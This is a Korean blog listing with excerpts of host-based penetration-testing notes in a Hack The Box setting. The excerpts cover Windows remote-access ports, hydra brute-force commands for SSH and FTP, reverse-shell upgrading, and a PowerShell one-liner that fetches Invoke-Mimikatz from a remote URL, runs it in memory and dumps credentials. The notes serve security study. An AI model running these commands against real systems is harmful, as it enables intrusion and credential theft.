해킹 122

[ 호스트 기반 모의해킹 ] 윈도우 원격 접근 방법

윈도우 원격 접근- 리눅스 원격 접근> SSH, Telnet, 웹, VNC ... - 윈도우> RDP (3389)> WinRM (5985, 5986)> SMB (445)> WMI (135) - 공식 권장 - RDP + WinRM- 비공식 - SMB + WMI   실제 구현Hack the box 모의해킹이나 박스 형태의 모의 침투를 수행할 때 계정 정보를 획득했다고 가정해보자.발견한 계정 정보는 다음과 같다.Administrators : Password123! 그럼 이 정보를 가지고 호스트에 어떻게 들어갈 것인지를 알아보자. 3389 조사 - rdp가장 처음으로 3389를 조사할 수 있다.nmap -p 3389 호스트 ip -Pn -n --open -sV결과PORT STATE SERVICE ..

[ 호스트 기반 모의해킹 ] 윈도우 - 파워쉘 인 메모리 실행

- 파워쉘 스크립트 메모리상에 로드 (Load/불러오기)IEX (new-object net.webclient).downloadstring('')예) IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimitakz.ps1') - 메모리 상에서 스크립트 내 함수 실행예) Invoke-Mimikatz -DumpCreds- 추후 후속 공격에서 많이 사용  powershell은 .NET을 사용할 수가 있는데, .NET은 여러 가지 기능을 가지고 있다.이 중에서 http client라는..

[ 호스트 기반 모의해킹 ] 계정 정보 기반 공격

hydra를 많이 씀. hydra의 장점은 ssh, ftp, http 등등 여러 서비스에 공격을 할 수 있다는 점. ssh나 ftp hydra를 통해 ssh (22번 포트를 공격할 때)hydra -L users.txt -P pass.txt ssh://ip -V -s 22-V 옵션을 주면 어떤 과정으로 공격이 진행되는 지를 볼 수 있음.-s 22 처럼 포트 번호는 안 줘도 되지만 주는 게 더 좋음.hydra를 통해 ftp (21번 포트를 공격할 때)hydra -L users.txt -P pass.txt ftp://ip -V -s 21  httpssh나 ftp 같은 경우는 그냥 원라인으로 hydra를 통해 브루트포스가 가능하지만http는 준비해야할 것이 있음. - 어떤 url에서 로그인을 하는가를 알고 있어..

[ 호스트 기반 모의해킹 ] 리버스 쉘 업그레이드

리버스 쉘 업그레이드 일반적인 리버스 쉘 == Dumb 쉘> 탭 완성, 단축키, Interactive CLI, job control 사용 불가능> 명령 입력/출력"만" 가능 단축키 / job control은 리버스 쉘을 받은 호스트에서 먼저 실행> 단축키 - ex) ctrl+c> Job Control - 프로세스의 상태 변경 (멈춤, 실행, 백그라운드) 이후 명령어 전송 => 출력값 수신 예) 리버스 쉘 => ctrol+c 불가능예) 리버스 쉘 => mysql 불가능 Fully Interactive TTY Shell> 실제 콘솔 및 SSH와 똑같은 환경> 모든 단축키, job control, interactive CLI 프로그램 실행 가능 Dumb Shell => Fully Interactive TTY ..